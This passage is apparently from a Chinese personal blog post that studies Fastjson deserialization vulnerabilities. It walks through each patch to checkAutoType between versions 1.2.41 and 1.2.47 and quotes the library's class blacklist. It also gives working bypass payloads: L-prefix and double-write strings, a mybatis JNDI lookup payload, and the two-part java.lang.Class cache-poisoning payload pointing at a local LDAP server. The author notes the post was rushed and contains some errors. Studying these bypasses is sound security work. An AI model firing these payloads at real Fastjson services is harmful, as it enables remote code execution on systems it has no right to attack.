    if (!autoTypeSupport) &#123;
        for (int i &#x3D; 0; i &lt; denyList.length; ++i) &#123;
            String deny &#x3D; denyList[i];
            if (className.startsWith(deny)) &#123;
                throw new JSONException(&quot;autoType is not support. &quot; + typeName);
            &#125;
        &#125;
        for (int i &#x3D; 0; i &lt; acceptList.length; ++i) &#123;
            String accept &#x3D; acceptList[i];
            if (className.startsWith(accept)) &#123;
                clazz &#x3D; TypeUtils.loadClass(typeName, defaultClassLoader);
 
                if (expectClass !&#x3D; null &amp;&amp; expectClass.isAssignableFrom(clazz)) &#123;
                    throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
                &#125;
                return clazz;
            &#125;
        &#125;
    &#125;
 
    if (autoTypeSupport || expectClass !&#x3D; null) &#123;
        clazz &#x3D; TypeUtils.loadClass(typeName, defaultClassLoader);
    &#125;
 
    if (clazz !&#x3D; null) &#123;
 
        if (ClassLoader.class.isAssignableFrom(clazz) &#x2F;&#x2F; classloader is danger
            || DataSource.class.isAssignableFrom(clazz) &#x2F;&#x2F; dataSource can load jdbc driver
           ) &#123;
            throw new JSONException(&quot;autoType is not support. &quot; + typeName);
        &#125;
 
        if (expectClass !&#x3D; null) &#123;
            if (expectClass.isAssignableFrom(clazz)) &#123;
                return clazz;
            &#125; else &#123;
                throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
            &#125;
        &#125;
    &#125;
 
    if (!autoTypeSupport) &#123;
        throw new JSONException(&quot;autoType is not support. &quot; + typeName);
    &#125;
 
    return clazz;
&#125;</code></pre>

<p>简单地说，<code>checkAutoType()</code>函数就是使用黑白名单的方式对反序列化的类型继续过滤，acceptList为白名单（默认为空，可手动添加），denyList为黑名单（默认不为空）</p>
<pre class="language-java" data-language="java"><code class="language-java">&#x2F;&#x2F;denyList
bsh
com.mchange
com.sun.
java.lang.Thread
java.net.Socket
java.rmi
javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework</code></pre>

<p>这里因为黑名单中包含了”com.sun.”，所以就把我们前面的几个利用链都给过滤了</p>
<p>先在如果还是用之前的payload会报错</p>
<p><code>autoType is not support. com.sun.rowset.JdbcRowSetImpl</code></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524144135776.png" alt="image-20230524144135776"></p>
<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h3><p>绕过的前提是autoTypeSupport开启，在这种情况下</p>
<p>调用checkAutoType后，会先进行这个if判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524145217675.png" alt="image-20230524145217675"></p>
<p>也就是先找白名单，找到直接加载，找不到就去找黑名单，找到直接报错。</p>
<p>假设都没找到，在后面也还是会加载类</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524145300385.png" alt="image-20230524145300385"></p>
<p>所以只要想办法绕过第一个if里的对黑名单的检测就可以了</p>
<p>跟一下后面这个loadClass</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524145340344.png" alt="image-20230524145340344"></p>
<p>会发现它在加载之前会对传进去的特定内容进行一个切割，对切割后的内容进行类加载</p>
<p>所以我们让com.sun.rowset.JdbcRowSetImpl以L开头，以；结尾</p>
<p>变为Lcom.sun.rowset.JdbcRowSetImpl;</p>
<p>这样既能绕过黑名单，又能实现类加载</p>
<p>poc为</p>
<pre class="language-java" data-language="java"><code class="language-java">public class text &#123;
    public static void main(String[] args) &#123;
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);  &#x2F;&#x2F;开启autoTypeSupport
        String poc &#x3D; &quot;&#123;\&quot;@type\&quot;:\&quot;Lcom.sun.rowset.JdbcRowSetImpl;\&quot;,\&quot;DataSourceName\&quot;:\&quot;ldap:&#x2F;&#x2F;127.0.0.1:9999&#x2F;a\&quot;,\&quot;autoCommit\&quot;:true&#125;&quot;;
        JSON.parse(poc);
    &#125;
&#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524145610564.png" alt="image-20230524145610564"></p>
<h2 id="1-2-42"><a href="#1-2-42" class="headerlink" title="1.2.42"></a>1.2.42</h2><h3 id="修复-1"><a href="#修复-1" class="headerlink" title="修复"></a>修复</h3><p>在这个版本中，依旧用了黑白名单的方式，但是用hash的方式存的黑名单。应该是为了防止其他人根据这个去找绕过的路径</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524181433397.png" alt="image-20230524181433397"></p>
<p>然后再checkAutoType方法里加了个这种东西。如果这个类名是以L开头和以;结尾的，就去掉第一个字符和最后一个字符再进行后面的判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524181855173.png" alt="image-20230524181855173"></p>
<p><del>吐槽一下，这个if判断至于也要写成hash的形式吗，这截取的substring这么明显，而且截取的方式是不是有点太草率了</del></p>
<h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过</h3><p>双写</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524183124401.png" alt="image-20230524183124401"></p>
<pre class="language-java" data-language="java"><code class="language-java">public class text &#123;
    public static void main(String[] args) &#123;
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);  &#x2F;&#x2F;开启autoTypeSupport
        String poc &#x3D; &quot;&#123;\&quot;@type\&quot;:\&quot;LLcom.sun.rowset.JdbcRowSetImpl;;\&quot;,\&quot;DataSourceName\&quot;:\&quot;ldap:&#x2F;&#x2F;127.0.0.1:9999&#x2F;a\&quot;,\&quot;autoCommit\&quot;:true&#125;&quot;;
        JSON.parse(poc);
    &#125;
&#125;</code></pre>

<h2 id="1-2-43"><a href="#1-2-43" class="headerlink" title="1.2.43"></a>1.2.43</h2><h3 id="修复-2"><a href="#修复-2" class="headerlink" title="修复"></a>修复</h3><p>在checkAutoType里对传入的东西再加了一层判断，如果前两位是LL，那就直接报错</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524205412360.png" alt="image-20230524205412360"></p>
<h3 id="绕过-2"><a href="#绕过-2" class="headerlink" title="绕过"></a>绕过</h3><p>在loadClass里除了对L开头；结尾的输入进行处理，还对[开头的输入也进行了截取，所以</p>
<p>[com.sun.rowset.JdbcRowSetImpl，通过这个方式可以过checkAutotype检测</p>
<p>但是这样会有个报错</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524210618496.png" alt="image-20230524210618496"></p>
<p>这里就需要你在类路径后边加上[{，至于为什么还没怎么跟，原因就是</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524210730026.png" alt="image-20230524210730026"></p>
<p>具体源码没跟，以后有空再说</p>
<h2 id="1-2-44"><a href="#1-2-44" class="headerlink" title="1.2.44"></a>1.2.44</h2><h3 id="修复-3"><a href="#修复-3" class="headerlink" title="修复"></a>修复</h3><p>在<code>checkAutoType</code>中进行判断如果类名以<code>[</code>开始则直接抛出异常，由字符串处理导致的黑名单绕过也就告一段落了。</p>
<h3 id="绕过-3"><a href="#绕过-3" class="headerlink" title="绕过"></a>绕过</h3><p>这个版本没绕过，倒不是因为这个版本就没洞了，只不过是因为在之后版本发现的payload在这个版本也能用</p>
<h2 id="1-2-45"><a href="#1-2-45" class="headerlink" title="1.2.45"></a>1.2.45</h2><h3 id="修复-4"><a href="#修复-4" class="headerlink" title="修复"></a>修复</h3><p>也不能叫修复吧，毕竟上个版本也没爆漏洞</p>
<p>增加了黑名单</p>
<h3 id="绕过-4"><a href="#绕过-4" class="headerlink" title="绕过"></a>绕过</h3><p>这里安全研究者将目光投向了组件身上</p>
<p>1.2.45的payload就是由mybatis导致的组件漏洞</p>
<p>先贴一个payload</p>
<pre class="language-java" data-language="java"><code class="language-java">&#123;&quot;@type&quot;:&quot;org.apache.ibatis.datasource.jndi.JndiDataSourceFactory&quot;,&quot;properties&quot;:&#123;&quot;data_source&quot;:&quot;ldap:&#x2F;&#x2F;localhost:1389&#x2F;Exploit&quot;&#125;&#125;</code></pre>

<p>由于org.apache.ibatis.datasource.jndi.JndiDataSourceFactory不在黑名单，所以能绕过checkAutoType的判断</p>
<p>然后按照Fastjson的特性，会去调用属性的set方法赋值</p>
<p>这个payload里有properties方法，理所当然的会去调用setProperties</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524212504342.png" alt="image-20230524212504342"></p>
<p>又因为我们给properties赋的值的键是data_source</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524212618440.png" alt="image-20230524212618440"></p>
<p>满足这个else if判断</p>
<p>这是里调用了lookup方法，而里边的getProperty方法就是获取data_source这个键对应的值</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524212743667.png" alt="image-20230524212743667"></p>
<p>现在我们有了一个lookup方法，还有了个可控的url</p>
<p>就能实现jndi注入了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524212900228.png" alt="image-20230524212900228"></p>
<h2 id="1-2-47"><a href="#1-2-47" class="headerlink" title="1.2.47"></a>1.2.47</h2><h3 id="修复-5"><a href="#修复-5" class="headerlink" title="修复"></a>修复</h3><p>没怎么找资料，大概也就是把org.apache.ibatis.datasource.jndi.JndiDataSourceFactory类也放黑名单里了之类的，这个版本重点在绕过</p>
<h3 id="绕过-5"><a href="#绕过-5" class="headerlink" title="绕过"></a>绕过</h3><p>自1.2.24漏洞修复后，我们的绕过都需要依赖<strong>AutoTypeSupport</strong>为true才能实现，这其实大大限制了我们的利用，而1.2.47版本出现的利用方式则解决了这一问题</p>
<p>这里出问题的还是负责安全检查的checkAutoType方法</p>
<pre class="language-java" data-language="java"><code class="language-java">public Class&lt;?&gt; checkAutoType(String typeName, Class&lt;?&gt; expectClass, int features) &#123;
       &#x2F;&#x2F; 类名非空判断
       if (typeName &#x3D;&#x3D; null) &#123;
           return null;
       &#125;
       &#x2F;&#x2F; 类名长度判断，不大于128不小于3
       if (typeName.length() &gt;&#x3D; 128 || typeName.length() &lt; 3) &#123;
           throw new JSONException(&quot;autoType is not support. &quot; + typeName);
       &#125;

       String className &#x3D; typeName.replace(&#39;$&#39;, &#39;.&#39;);
       Class&lt;?&gt; clazz &#x3D; null;

       final long BASIC &#x3D; 0xcbf29ce484222325L; &#x2F;&#x2F;;
       final long PRIME &#x3D; 0x100000001b3L;  &#x2F;&#x2F;L

       final long h1 &#x3D; (BASIC ^ className.charAt(0)) * PRIME;
       &#x2F;&#x2F; 类名以 [ 开头抛出异常
       if (h1 &#x3D;&#x3D; 0xaf64164c86024f1aL) &#123; &#x2F;&#x2F; [
           throw new JSONException(&quot;autoType is not support. &quot; + typeName);
       &#125;
       &#x2F;&#x2F; 类名以 L 开头以 ; 结尾抛出异常
       if ((h1 ^ className.charAt(className.length() - 1)) * PRIME &#x3D;&#x3D; 0x9198507b5af98f0L) &#123;
           throw new JSONException(&quot;autoType is not support. &quot; + typeName);
       &#125;

       final long h3 &#x3D; (((((BASIC ^ className.charAt(0))
               * PRIME)
               ^ className.charAt(1))
               * PRIME)
               ^ className.charAt(2))
               * PRIME;
       &#x2F;&#x2F; autoTypeSupport 为 true 时，先对比 acceptHashCodes 加载白名单项
       if (autoTypeSupport || expectClass !&#x3D; null) &#123;
           long hash &#x3D; h3;
           for (int i &#x3D; 3; i &lt; className.length(); ++i) &#123;
               hash ^&#x3D; className.charAt(i);
               hash *&#x3D; PRIME;
               if (Arrays.binarySearch(acceptHashCodes, hash) &gt;&#x3D; 0) &#123;
                   clazz &#x3D; TypeUtils.loadClass(typeName, defaultClassLoader, false);
                   if (clazz !&#x3D; null) &#123;
                       return clazz;
                   &#125;
               &#125;
               &#x2F;&#x2F; 再对比 denyHashCodes 进行黑名单匹配
               &#x2F;&#x2F; 如果黑名单有匹配并且 TypeUtils.mappings 里没有缓存这个类
               &#x2F;&#x2F; 则抛出异常
               if (Arrays.binarySearch(denyHashCodes, hash) &gt;&#x3D; 0 &amp;&amp; TypeUtils.getClassFromMapping(typeName) &#x3D;&#x3D; null) &#123;
                   throw new JSONException(&quot;autoType is not support. &quot; + typeName);
               &#125;
           &#125;
       &#125;

       &#x2F;&#x2F; 尝试在 TypeUtils.mappings 中查找缓存的 class
       if (clazz &#x3D;&#x3D; null) &#123;
           clazz &#x3D; TypeUtils.getClassFromMapping(typeName);
       &#125;

       &#x2F;&#x2F; 尝试在 deserializers 中查找这个类
       if (clazz &#x3D;&#x3D; null) &#123;
           clazz &#x3D; deserializers.findClass(typeName);
       &#125;

       &#x2F;&#x2F; 如果找到了对应的 class，则会进行 return
       if (clazz !&#x3D; null) &#123;
           if (expectClass !&#x3D; null
                   &amp;&amp; clazz !&#x3D; java.util.HashMap.class
                   &amp;&amp; !expectClass.isAssignableFrom(clazz)) &#123;
               throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
           &#125;

           return clazz;
       &#125;

       &#x2F;&#x2F; 如果没有开启 AutoTypeSupport ，则先匹配黑名单，在匹配白名单，与之前逻辑一致
       if (!autoTypeSupport) &#123;
           long hash &#x3D; h3;
           for (int i &#x3D; 3; i &lt; className.length(); ++i) &#123;
               char c &#x3D; className.charAt(i);
               hash ^&#x3D; c;
               hash *&#x3D; PRIME;

               if (Arrays.binarySearch(denyHashCodes, hash) &gt;&#x3D; 0) &#123;
                   throw new JSONException(&quot;autoType is not support. &quot; + typeName);
               &#125;

               if (Arrays.binarySearch(acceptHashCodes, hash) &gt;&#x3D; 0) &#123;
                   if (clazz &#x3D;&#x3D; null) &#123;
                       clazz &#x3D; TypeUtils.loadClass(typeName, defaultClassLoader, false);
                   &#125;

                   if (expectClass !&#x3D; null &amp;&amp; expectClass.isAssignableFrom(clazz)) &#123;
                       throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
                   &#125;

                   return clazz;
               &#125;
           &#125;
       &#125;
       &#x2F;&#x2F; 如果 class 还为空，则使用 TypeUtils.loadClass 尝试加载这个类
       if (clazz &#x3D;&#x3D; null) &#123;
           clazz &#x3D; TypeUtils.loadClass(typeName, defaultClassLoader, false);
       &#125;

       if (clazz !&#x3D; null) &#123;
           if (TypeUtils.getAnnotation(clazz,JSONType.class) !&#x3D; null) &#123;
               return clazz;
           &#125;

           if (ClassLoader.class.isAssignableFrom(clazz) &#x2F;&#x2F; classloader is danger
                   || DataSource.class.isAssignableFrom(clazz) &#x2F;&#x2F; dataSource can load jdbc driver
                   ) &#123;
               throw new JSONException(&quot;autoType is not support. &quot; + typeName);
           &#125;

           if (expectClass !&#x3D; null) &#123;
               if (expectClass.isAssignableFrom(clazz)) &#123;
                   return clazz;
               &#125; else &#123;
                   throw new JSONException(&quot;type not match. &quot; + typeName + &quot; -&gt; &quot; + expectClass.getName());
               &#125;
           &#125;

           JavaBeanInfo beanInfo &#x3D; JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy);
           if (beanInfo.creatorConstructor !&#x3D; null &amp;&amp; autoTypeSupport) &#123;
               throw new JSONException(&quot;autoType is not support. &quot; + typeName);
           &#125;
       &#125;

       final int mask &#x3D; Feature.SupportAutoType.mask;
       boolean autoTypeSupport &#x3D; this.autoTypeSupport
               || (features &amp; mask) !&#x3D; 0
               || (JSON.DEFAULT_PARSER_FEATURE &amp; mask) !&#x3D; 0;

       if (!autoTypeSupport) &#123;
           throw new JSONException(&quot;autoType is not support. &quot; + typeName);
       &#125;

       return clazz;
   &#125;</code></pre>

<p>这里其实有个问题</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524214001583.png" alt="image-20230524214001583"></p>
<p>这块，如果开启了autoTypeSupport，fastjson还是会限制黑名单类的反序列化，但是前提是TypeUtils.mappings里没有缓存这个类，那假如缓存了，即使身处黑名单中的类，也可以继续被程序反序列化</p>
<p>而在 autoTypeSupport 为默认的 false 时，程序直接检查黑名单并抛出异常，在这部分我们无法绕过，所以必须想办法在当autoTypeSupport为false时执行的这个if判断前实现我们的攻击目的，或者退出checkAutoType方法</p>
<p>在这个if判断之前就这点代码</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524214858725.png" alt="image-20230524214858725"></p>
<p>由于clazz初值是null，前面也没地方赋值，所以其实在这个if之前就俩if判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524215007194.png" alt="image-20230524215007194"></p>
<p>假如在这里面能实现攻击那自然不用再管后面的程序，而如果能在这里面把clazz的值给赋上，那就能在判断autoTypeSupport是否为假的if判断前退出程序</p>
<p>先看 deserializers ，位于 <code>com.alibaba.fastjson.parser.ParserConfig.deserializers</code> ，是一个 IdentityHashMap，能向其中赋值的函数有：</p>
<ul>
<li><code>getDeserializer()</code>：这个类用来加载一些特定类，以及有 <code>JSONType</code> 注解的类，在 put 之前都有类名及相关信息的判断，无法为我们所用。</li>
<li><code>initDeserializers()</code>：无入参，在构造方法中调用，写死一些认为没有危害的固定常用类，无法为我们所用。</li>
<li><code>putDeserializer()</code>：被前两个函数调用，我们无法控制入参。</li>
</ul>
<p>因此我们无法向 deserializers 中写入值，也就在其中读出我们想要的恶意类。所以我们的目光转向了 <code>TypeUtils.getClassFromMapping(typeName)</code>。</p>
<p>这个方法从 <code>TypeUtils.mappings</code> 中取值，这是一个 ConcurrentHashMap 对象，</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524222728948.png" alt="image-20230524222728948"></p>
<p>能向其中赋值的函数有：</p>
<ul>
<li><code>addBaseClassMappings()</code>：无入参，加载</li>
</ul>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524222801525.png" alt="image-20230524222801525"></p>
<p><code>loadClass()</code>：关键函数</p>
<pre class="language-java" data-language="java"><code class="language-java">public static Class&lt;?&gt; loadClass(String className, ClassLoader classLoader, boolean cache) &#123;
        &#x2F;&#x2F; 非空判断
        if(className &#x3D;&#x3D; null || className.length() &#x3D;&#x3D; 0)&#123;
            return null;
        &#125;
        &#x2F;&#x2F; 防止重复添加
        Class&lt;?&gt; clazz &#x3D; mappings.get(className);
        if(clazz !&#x3D; null)&#123;
            return clazz;
        &#125;
        &#x2F;&#x2F; 判断 className 是否以 [ 开头
        if(className.charAt(0) &#x3D;&#x3D; &#39;[&#39;)&#123;
            Class&lt;?&gt; componentType &#x3D; loadClass(className.substring(1), classLoader);
            return Array.newInstance(componentType, 0).getClass();
        &#125;
        &#x2F;&#x2F; 判断 className 是否 L 开头 ; 结尾
        if(className.startsWith(&quot;L&quot;) &amp;&amp; className.endsWith(&quot;;&quot;))&#123;
            String newClassName &#x3D; className.substring(1, className.length() - 1);
            return loadClass(newClassName, classLoader);
        &#125;
        try&#123;
            &#x2F;&#x2F; 如果 classLoader 非空，cache 为 true 则使用该类加载器加载并存入 mappings 中
            if(classLoader !&#x3D; null)&#123;
                clazz &#x3D; classLoader.loadClass(className);
                if (cache) &#123;
                    mappings.put(className, clazz);
                &#125;
                return clazz;
            &#125;
        &#125; catch(Throwable e)&#123;
            e.printStackTrace();
            &#x2F;&#x2F; skip
        &#125;
        &#x2F;&#x2F; 如果失败，或没有指定 ClassLoader ，则使用当前线程的 contextClassLoader 来加载类，也需要 cache 为 true 才能写入 mappings 中
        try&#123;
            ClassLoader contextClassLoader &#x3D; Thread.currentThread().getContextClassLoader();
            if(contextClassLoader !&#x3D; null &amp;&amp; contextClassLoader !&#x3D; classLoader)&#123;
                clazz &#x3D; contextClassLoader.loadClass(className);
                if (cache) &#123;
                    mappings.put(className, clazz);
                &#125;
                return clazz;
            &#125;
        &#125; catch(Throwable e)&#123;
            &#x2F;&#x2F; skip
        &#125;
        &#x2F;&#x2F; 如果还是失败，则使用 Class.forName 来获取 class 对象并放入 mappings 中
        try&#123;
            clazz &#x3D; Class.forName(className);
            mappings.put(className, clazz);
            return clazz;
        &#125; catch(Throwable e)&#123;
            &#x2F;&#x2F; skip
        &#125;
        return clazz;
    &#125;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524223019994.png" alt="image-20230524223019994"></p>
<p>所以可以通过控制传参实现在mapping里放入任意的类</p>
<p>这个loadClass有三个重载</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524223745658.png" alt="image-20230524223745658"></p>
<p>我们的目标就是调用第三个，而从一或者从二都能到第三个。</p>
<p>因为第三个只在checkAutoType里和第二个loadClass里调用</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524223939519.png" alt="image-20230524223939519"></p>
<p>所以这个没戏了</p>
<p>然后这里重点看一下两个参数的loadClass</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524224045140.png" alt="image-20230524224045140"></p>
<p>进deserialze里看一眼</p>
<p>这个类是用来处理一些乱七八糟类的反序列化类，其中就包括 <code>Class.class</code> 类，可以当我们加载恶意字节码的入口。</p>
<p>如果这个类是Class.class类型，就调用我们的loadClass</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524224323194.png" alt="image-20230524224323194"></p>
<p>再看一下loadClass的参数</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524225226576.png" alt="image-20230524225226576"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524225236990.png" alt="image-20230524225236990"></p>
<p>是可控的。只需要parser.resolveStatus 的值为TypeNameRedirect而且加载的是个Class.class类型的，就可以进入loadClass里</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524231749730.png" alt="image-20230524231749730"></p>
<p>在loadClass里，他会把我们传入的类加进缓存里，所以如果我们的恶意payload有两部分，第一部分负责将恶意类假如缓存，第二部分就可以绕过黑名单的检查去执行命令</p>
<p>加入缓存的地方找到了，接下来简单说一下调用的过程和构造payload的时候的参数问题</p>
<p>调用MiscCodec#deserialze的地方在DefaultJSONParser#parseObject。在安全检查的后边，但是因为我们第一部分的payload肯定不会触发安全检查的报错，也就是说MiscCodec#deserialze一定会被触发</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524232603778.png" alt="image-20230524232603778"></p>
<p>这个clazz就是@type的值，然后由于MiscCodec#deserialze里有</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524233059139.png" alt="image-20230524233059139"></p>
<p>所以想要进缓存的类的键必须为val</p>
<p>我们可以编写</p>
<p>第一部分的payload了</p>
<p><code>&#123;&quot;@type&quot;:&quot;java.lang.Class&quot;,&quot;val&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;&#125;</code></p>
<p>后边就没啥说的了，因为绕过了安全检查，所以第二部分用之前JdbcRowSetImpl链的payload就行</p>
<p>完整payload</p>
<pre class="language-java" data-language="java"><code class="language-java">String poc &#x3D; &quot;&#123;&#123;\&quot;@type\&quot;:\&quot;java.lang.Class\&quot;,\&quot;val\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;&#125;,&#123;\&quot;@type\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;,\&quot;DataSourceName\&quot;:\&quot;ldap:&#x2F;&#x2F;127.0.0.1:9999&#x2F;a\&quot;,\&quot;autoCommit\&quot;:true&#125;&#125;&quot;;
</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230524233602557.png" alt="image-20230524233602557"></p>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>这篇其实写的挺赶的，主要是先为了学会利用，所以没怎么细跟代码，而且有点错误在里边，比如1.2.47的payload的不受AutoTypeSupport影响的版本：其实是<code>1.2.25 &lt;= fastjson &lt;= 1.2.32</code>而受AutoTypeSupport影响版本有<code>1.2.33 &lt;= fastjson &lt;= 1.2.47</code></p>
<p>具体原因还没看</p>
<p>还有就是关于高jdk版本绕过以及fastjson-1.2.68和fastjson结合原生反序列化利用的漏洞利用没写，等打完国赛或者过完期末再补吧</p>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a target="_blank" rel="noopener" href="https://su18.org/post/fastjson/">https://su18.org/post/fastjson/</a></p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1579/">https://tttang.com/archive/1579/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1bG4y157Ef/?spm_id_from=333.999.0.0&vd_source=053f03b424a45370bc5813843ae5268f">fastjson反序列化漏洞3-&lt;=1.2.47绕过_哔哩哔哩_bilibili</a></p>
<p><a target="_blank" rel="noopener" href="https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">FastJson与原生反序列化 | Y4tacker&#39;s Blog</a></p>
<p><a target="_blank" rel="noopener" href="https://goodapple.top/archives/832">https://goodapple.top/archives/832</a></p>
<p><a target="_blank" rel="noopener" href="https://johnfrod.top/%E5%AE%89%E5%85%A8/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E3-%E5%8E%86%E5%8F%B2%E7%89%88%E6%9C%AC%E7%BB%95%E8%BF%87/">Fastjson反序列化漏洞(3)—历史版本绕过 – JohnFrod&#39;s Blog</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://Ethe448.github.io/2023/05/07/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">https://Ethe448.github.io/2023/05/07/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Ethe</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                    <span class="chip bg-color">web学习</span>
                                </a>
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
